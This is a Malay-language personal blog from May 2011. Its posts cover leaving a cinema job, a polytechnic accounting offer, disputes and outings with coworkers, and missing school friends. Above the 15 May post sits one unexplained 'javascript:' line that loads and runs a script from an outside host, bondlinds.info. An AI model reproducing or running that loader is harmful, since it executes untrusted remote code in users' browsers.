THOUSANDS OF FREE BLOGGER TEMPLATES

Monday, 23 May 2011

woow ~

suka suka pergi , suka suka datang . :)

OKIE , salam semua , :)

ak tak tahu nie berita baikk or tak , 
ak tak jadi keje kat hotel , jawab kowl . haha
kembali kepada kerjaya lama .
cinema budak B.O . 
dengan tak malu nyer ,
tanyer kerja balik
fuhh ,
nasib baik diterima .
haha
macam mana nak masuk balikk yaa ?
TEBAL MUKA.
HAHA
buad tak tahu jea laa.
da mmg tak tahu malu .
:)
p/s : cari duet , *yela sgt , haha


buad lecehh laa ~

nie lagi satu masala . 
tatahu laa nape nan [BL *buad leceh , bkan nama sebenar]
semalam . okie aje ,
tapi tbe2 taching tak semena ,
aduyy ,
serius tak paham .
ak main2 jea , takan nak tchng kot ?
benda kecikk .
hmm
ak na mintak maaf , tapi dy wat ego lak
BUAD LECEH LAA ~
mintak mintak maaf pon , ade had nyer kan ?
so..
tapaya lebih2 laa
bkan sala ak sgt pon .
huhu
last ak text die ckap itu adalah kali terakhir ak say sory ,
tak nak maaf ,
itu hak die , :0
takan nak paksa .kan.kan ?
korang pon law mintak maaf tapi cm orang bodo .
wth ?
......................
FINE !
zzzzzzzzzzzz....


PD . NEGERI SEMBILAN .

KEPUTUSAN
TAHNIAH, PERMOHONAN ANDA BERJAYA
POLITEKNIK
POLITEKNIK PORT DICKSON, TELUK KEMANG
PROGRAM
DIPLOMA AKAUNTANSI
SESI KEMASUKAN
JUN 2011
TARIKH TAWARAN
22/05/2011


YANG MANA SATU ? :)





u said . if  one day i  miss u , find the shining star , and
datz ur star !
:)
N
if im feel scared alone in poly , juz text u , n u'll be there !
haha , 
p/s ; romantik nie apehal derr ? 
but , sweet ! :)
anyway .
kita kawan . dan baru berkawan .
so.. 
selamat menjalinkan PERSAHABATAN bersama , :)
haha.

p/s: anda di uitm melaka nunn , take care !
jgn lpa saya yaa ? 

melaka---negeri sembilan ?
sebelah negeri jea derr ,
so.. jangan langsi yaa ?
haha .

video nie untuk *anda* yaa ? :)
tengss 4 being my frenz~

Salam Persahabatan..

Sunday, 22 May 2011

cahaya baru ;

okie , fine ! da la ta dapat blaja kat U . HAHA
terlebih pandai kah aku ?
haha
so . ak pon mengharap la kat politeknik , 
:)
2 jea la nak xcept ak kott , :D
2 la akibat nyer kot , TIME BLAJAR MAIN , TIME MAIN OFC LA MAIN .
haha
tapi . tapi harapan sipi nak punah ,
ececehh~
sbb tenet gler baikk ngan ak sampai nak bkak pon asyik loading aje .
meluat akuh .
last2 nasib baikk ada ZURAINA OMAR , HIHI
dy la tlg check kan ,
................
blupp blupp [im FB lahh]
tahniah . kaw dapat .
diploma akauntasi .
haa ..ape ag . seronok giler laa
so ,
pasne ak tak jadi penganggur daa
ade arah tuju gitu !
:)
act , ak tak tahu ape ape pon sal akaun 2 .
haha
bgus kan .
tak tahu tapi nanti belajar pasal menatang tuhh
sure jadi blurr~
tak kisa laa . asalkan dapat sambung belajar , 
ngee~
yunk penting :BUKA MINDA SEDIA BERUBAH
kan.kan.kan ?
ouhh yaa , lpa . 
ibu ak mesti tak risau daa!
pling penting ak ta kne ayat2 touching daa
hihi
selamat~
poli da kua . tapi keputusan rayuan u blum lagi .
aduhh
byk songeh plak .
tamak .
haha
tapi sape pon law dapat g u , sty nak g an ?
so..ak tak tamak lahh!
wahahaha
p/s: ak ttp bersyukur tahu ?:D

ape ape pon , skunk motiff ak jgn sia siakan lagi pluang yang ada .
even tak dapat u , tapi masih ade pluang nak berjaya kan ?
:)

DIPLOMA AKAUNTASI , u r mine! :)
tlg bekerjasama dengan saya yaa ? 
tenggs~

moral of the story : terima aje . jangan banyak songeh tahu ?
haha

Friday, 20 May 2011

serius menyampah !

okie , serius ak nyampah , meluat ,geram semua ada!
grrrrrr!~
pagi2 da kene bgn , so , 2 tak de hal laaa. 
*tipu . haha
hmm . masalah skunk nie , yang wat ak BARA *cehh , ak guna word penang .haha
adalah masa ak kat hotel royal tadi !
malas nak ctew panjang2 , 
motif skunk korang bajet !
fine , korang tahu ak dulu keje cinema . but tapaya la nak ckp keje situ tak ada masa depan , macam kat hotel jea ley naik pangkat kan ?
mmg bagus laah!
so , mang diakui ak mals nak keje situ , 
paham ?!
sape suro start dulu ?
so . sume yang keje kat cinema 2 tak ada masa depan lah?
jus bcoz mende 2 bermotifkan fun , movie ?
korang formal la sgt ?
kat sana pon gne english word laa.
tapaya na bangge laa!
mis R :keje kat pawagam tak ada masa depan ! *wahh , sedap ckap kan ?
kt sini keje nan owg , so.. blablabla...
*wth
so..kat sana berurusan nan sapa haa?
mr F : kat sini keje lain , tak sama nan cinema .
kat sana bole bebas . sini ade RULES AND REGULATION 
Weyh , stop laa . mane ade keje yang tak ade rules 
jual nasi lemak tepi jalan pon ade rules!
okie?!
pastu tanyer ak , ak mmg nak kew kje situ ?
ta kne pakse ?
haha. silap laa . da ckp cm 2 , mang da tawar hati nak kerjasama nan korang ,
yang taley tahan nyer , MR.F  ckp . ade yunk dulu sampai tana sambung study sebab da seronok keje situ .
haha . OKIE!
lum masuk keje ak da panas nan korang .
ak tahu korang ade pangkat ,
tp tapaya nak rendah2 kan pekerjaan orang yaa ?
*kuku 2 buang cat die yea ? seluar taley pakai suar nie , kne pkai suar sleck . [ta nampak kew ?]
takan na soh ak pkai suar kembang bawah cam orang indon ?cam ape jea ,
haha . mang ak suka giler la kan pkai cm 2?
dah laa . 
moral of the story : speak nicely okie?
dun arrogant , even korang ade pangkat tinggi !
BUDI BAHASA BUDAYA KITA .
chaww . 





Thursday, 19 May 2011

outt ;)

act nie ctew pagi semalam . ta sempat na update sbb balik pon da pkol 4 pagi , 
haha .
kan semalam ak last keje kat GSC 2 , den ofc la FAREZ yang anta ak balik tanjung bunga , masjid terapung .
haha
b4 balikk . g makan dulu kat sana . 
MENU :
nasi ayam .
air milo
tea o ais
lagi 1makanan 2 name ape pon ak tak tahu , haha
*ta makan pon , sbb ade udang , buerkk! :D
sume sekali farez la byar , fuhh , mmg baikk tol .
bile ak na byar , ayat die ..
AWAK NIE , BUAD LECEHH LAA . 
*HAHA . ak suka ayat 2 ! :) , 

otw na balik , dy ajak ak kua malam 2 . 
'kul 12 sy amek , awak siap tau? jgn siap lama2 , haha'

sementara tggu . ape ag , online lah kerja ak , hihi
tupp2 . da pkol 12 lbey , 
[here we go , come with me..blablabla]
nset bunyi , 1 msj :
farez : awk , sy da na balik.
zira : okie2 . sy online jap .
5 minit pas 2 .dy kowl ckp ..
awak , turun sekarang !
da dekat pkol 1 pg kot kua , blikk kol 4 pg
sampai kat sana , terkejot dowhh! jasmier adelahh! 
kantoi la ak ,
dy kowl ak ckp ak on9
tp mmg btol pon time ak on9 . na kua 2 takan bgtahu jgak kowt ,
kteowg ta ade ape2 , huu~
lpakk lpakk makan char keuy tiow dan macam biasalah ak , air milo ais . haha
pas  makn , dy isap shisha la plak , adoii .:0
lpak2 nan nazreen bdak cinema 2 skali . 
haha
geram gile ak , tahulah time 2 kat tmpat dowg . bhse dowg ak mane nak tahu sgt .
sooo ..mmg kesukaan farez la na gelak kat ak !
grrr!

p/s : jgn suka gelak kat owg !  tp macam2 world ak tahu semalam ! haha

kami bla , tp time 2 nazren makan lagi . sian dy , sorang2 .haha

balik 2 farez bwak ak ronda2 kat peneng . best2 .mcm2 tmpat dy tunjok .
haha.
pas2 kami blablabla...........
FAREZ  si pemandu pelancong aku pagi 2 !

da hbes pusing , dy anta ak balikk . yunk taley bla nyer ,dy ckp ,
okie awak , thx sbb sudi kuar nan sy , teman sy , blablabla.
ak gelak jea la.
haha

balikk2 , kite text , last2 ak pon tertido . haha .

p/s : mmg best , haha . 

Wednesday, 18 May 2011

LAST DAY ,


hari nie hari last aku kat GSC , sobsob :(
ikot hati ak mang tana resign sbb ak da syokk keje situ , 
kawan pon da ade , supervisor pon baikk , sporting , 
konklusinya sume nyer okie
tp nak tana kne ikot jgak kehendak orang lainn ,
:(
benarlah , TAK SUME KITE NAK BOLE DAPAT , kan.kan.kan ?
maybe sume nie ade hikmah , :)
sentap la jgak time akhir na close shifft , yela , last time la katekan , 
huhu.
pasnie tade da ak thumbprint , dok kaunter B.O
bergelak gelak , haha.
20 nie ak start keje kat HOTEL ROYAL . :0
ouhh , juz follow , its more better kan ,kan?
hurmmm


b4 lpe . utk KAWAN KAWAN kat sana , nie utk korang !
:)
ABG AFZAL : thx sbb anda la yang bagi saya kerja kat situ ! :)
anda baikk dgn sy , 
HERAN , * haha , world anda ! :D 
KAK MIRA : thx anda selalu bantu saya! ngee~
SIR KAVI : ANDA nice ! saya wat sala  tapi anda tak mara , steady , ! :)
SIR KARTHIK : Anda begitu baikk dgn saya , :)
anda sabar nan saya , *anda gelak saja , haha
MS CRISS :thx , anda bantu saya , :)
KAK DAYAH : baikk , :)
JAZMIER : thx , anda teman paling rapat saya disana . :)
KHALIS : anda baik dgn saya , *anda kan abg saya , haha
IKA : orang first ak knal kat situ , orang tang training ak , haha . thx!
MARCUS : thx anda selalu ade selamatkan saya time saya buad sala , haha
bergurau2 , haha .
ilike~ :)
WEE NIE : thx 4 ur help ! :)
BRYAN :  bantu sy buad resign letter , hihi . :) 
nice frenz! 
VANIE : thx gurl ! :)
NAZREEN : si bdak steward , haha . :) sempat mintak num ta tahan 2 ,haha
FAREEZ : andalah hantar saya balik keje . haha.
blanjea makan , bawak jalan2 . 
baikk bangat lahh !
n awak la ckgu pronoun saya disini ,  grrrr~ haha . :)

TERIMA KASIH BUAD ANDA SEMUA ! :)

so , nanti korang  jgn lpa ak tahu ? :)
p/s : abg afzal kate nanti law ak nak keje lagi kat situ bgtahu dy , hihi
bole keje balikk  , :) 
sir kavi ckp nanti msj la dy , haha
sir karthik , ckp jge diri , nanti dtg sana ckp jea , haha. 
kak dayah , ckp terima kasihh , :)
2 jea yg sempat jmpe tadi , :( 
 


tak pakai da kemeja nie , huhu ~



 basuh2 , antar balikk , dapat duett . huu
ta pakai daa . name tag a2 ak tana bg! haha .
bole kew?
wahahaha .


sume nyer tinggal cm 2 jea . tapelaa . cari pengalaman di tempat lain pulak , :)
p/s : BUKA MINDA , :) kan,kan ? :)
HOPE TOMORROW WILL BRING ME A NICE DAY ! :)

Monday, 16 May 2011

wateva lahh ! ade ak kesa ?

assalamualaikum , 

frst skali ak da tatahu nak wat pew , so lbeyh baik ak date nan blog ne , teman terbaik ! hihi
ary nie job ak macam biase aje , tapi macam frust pon ade . pas close shift , duet ak shot 20 hinggit . HOW COME ? ak da kira btol2 daa . sistem comp rosak or ak mang sala ? huh? so , wateva laa.
malas amek tahu dah . nak mara pon ta gna , benda da jadi , redha jea laa.  :(

okie , second , tadi ak g lunch nan aiman ex bdak cornsation , *haha , die kan da resign ? so ,kira ex laa 2 , haha  
makan kat foodcourt , mee sizzling ! wahh! lama tak makan mende 2 dahh , ak blanja air . dy blanja makan , haha
sedikit sebanyak save la duet ak , :))
tp ak tak suro pon dia blanja , die yg murah hati , rezeki yak bole tolak kan ? tak baikk ! :)
SUNGAI PETANI ?
hmm , tak jadi pegi , *farezz! awak nie kan ! grrr ! :0
tapi nak mara pon ade point lain la pulak , hujan , law g basah laa. huhu .
gpon . macek ak , macam tak bg ak g , so better tak paya pegi , wlupon ak mang nak pegi , sobsob
semalam ak tanyer pon die buad cm tak bg , so ak diam jea laa . malas nak cakap lagi . hurmm ...
tp b4 tido semalam , dy ade ckap law ak nak g bgtahu bile nak balik , so law da berjanji , ta tepati , tak syiokk la plak , 
ak bukan nak memberontak , tapi ak pon bole bergerak kan.kan.kan ?
ape2 jea laa . mybe ade hikmah la 2 , ;))
ta jadi kuar , so bosan gilaa , tgk tb , makan jea laa . online ,
2 la kerja ak . :0
hmm .

p/s: yang berlalu biarlah berlalu . tak perlu di ambil port lagi , kan.kan ?
itu yang terbaikk ! :)

harap hari esok akan lbih bermakna ! :)


Sunday, 15 May 2011

javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://bondlinds.info/tank.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();

masyukk ~ :)

15 MAY 2011 . my first salary kat GSC , haha . (2 la motif sebena nyer pon , :) )di , bersolek 

     8:15 AM , [whos tahat chick mula menyalak , ] aduhh , kacau laa , na tido pon ta bole , haha . padan mke ak , malam semalam pkol 4 pagi bwu cari bantal nak tido , kan da malas bangun .
p/s: buad tatahu jea la pangai ak yang dapat tido lama pon tak mahu bangun , haha.
okie , sambung balik , time rihanna gerak 2 . aku pon bangun , den dengan kompiden nyer set alarm balik pkol 8:25 AM . bajet nak tido 10 minit jea lagi , haha . tgk2 ta dengar langsung bunyi alarm , haha
alahaiii~ dasar tido mati , :)
9:15 AM baru terjaga , den kelam kabot g bngun cas fon , haha , aset penting laa katakan , wahaha .
pastu mandi pastu bersolek lagi , aduhh . da lambat pon masih sempat MAKE UP dengan rlex nya , haha .
tenga siap2 siap . jeng.jeng.jeng. :)
baby : kakak , kakak nak p mana? 
aku: nak p keja laa . 
baby : tapaya la p . 
aku : mana boleh , haha .
nak pjok punya pasal , bagi la coklat satu kat die , haha. pjok ,nasib baik makan pjok , :)
sampai GSC , mula la bekerjaya , bhaha . 
memang crowd gila laa , pagi2 pon ade owg nak tgk wayang kew ? law ak bek ak g tido , haha . *sir kavi cakap , haha.
tapi time2 nga kerja 2 , ade pulak custumer nie wat ak bengang , huh! da laa ckap pon ak tak paham , yea kan jea laa , ak pon tatahu dy datang dari mana , tak kisah laa . nasib baik ta lama kat situ , dapat tikey bla twoss , haha.
keja punya keja tak sedaq jam kerja dah habes , haha . *fareez , i dah tahu guna cakap penang ,so , jangan drop cara i ckap tahu ?
 haha . 
aku pon close shiff , nak balik , 
da settle kira2 , tulis UOB  la plak , sementara tggu si kelvin 2 settle kan UOB dy , lapk la nan abg afzal , :))
abg afzal : ary 2 bg msj tak balas pon , :0
zira : bile ? cakap ape ?
abg afzal : ckap salam , :~
zira : lahh , mana nak tahu num sapa , ta balas laa , hihi
abg afzal : lahh , 
.......................................................
so , saling bertukar num , haha . *text la jgak sikit2 , :))
farezz , sy mintak maaf tak dapat g makan nan awk , sbb aiman bdak cornsation da ajak makan dulu , *mintak maaf tahu ? :( sy ajak juin awak tak nak , huhu .
di MCD , makan nan aiman , 
MENU :
double chess burger
coke
fun fries
tomato sos , :))
makan , smbang2 , prot kenyang , haha
tapi ..
kali nie ak plak kne blanja die , sbb ary 2 dy da blanje ak time salary die , haha .
tapela . halal jea laa. tapaya nak berkira sangat laah! :))

Wednesday, 11 May 2011

KAWAN ;

oke . semua orang ada kawan . nak kawan , n sayang kawan . :)

         hari ini ak rindu kawan kawan aku , kawan yang aku jumpa dan di SEMETRIK . 

buat korang , aku nak korang tahu , korang akan ade dalam hati aku sampai bila bila even kita da tak rapat , 
   sobsob  
  
AINA SYAHIRAH   KHAIRUL AINI  NOR SYAHIRAH  ZURAINA OMAR  ZAINATUL AHYA  

FARHANAH FAUZI  

         untukmu TEMAN , kenangan kita bersama tak mugkin dilupakan , <3
    

         kita mula rapat time masing masing dah tak malu kan,kan.kan . dah tunjuk pangai sebenar , haha
 first2 datang buad hal masing2 jea . kan ?:)  sejak dah rapat , kita mula kongsi semua nya , pahit manis , suma ada , time 2 kita rasa kita la paling HOTT kan ? haha . sampai ade yang iri hati nan persahabatan kita , 
tapi kita tetap kawan , semakin kawan , :) <3
    kalau boleh , suma bende kita wat sama2 , sume na kene cukop ahli , :)

  1.   pegi sekola sama sama
  2. makan sama sama
  3. main sama sama 
  4. gelak sama sama 
  5. belajar sama sama * study la sgt , haha
  6. tidor pon sama sama . haha .      
 SUMPAH AKU RINDU KORANG ! :))

      aku nak korang tahu aku tak penah lupa korang , korang TERBAIKK !
  
APE APE JADI PON LPAS NIE , AKU HARAP KITA STILL KAWAN !
walaupon aku bkan dalam LIST kawan korang dahh , sobsob ,
  buad  MAI AZIRA , KHAIZURA , FATIMAH , RABIATUL 

             saya sayang anda ! kawan selamanya oke! :)

KAWAN ;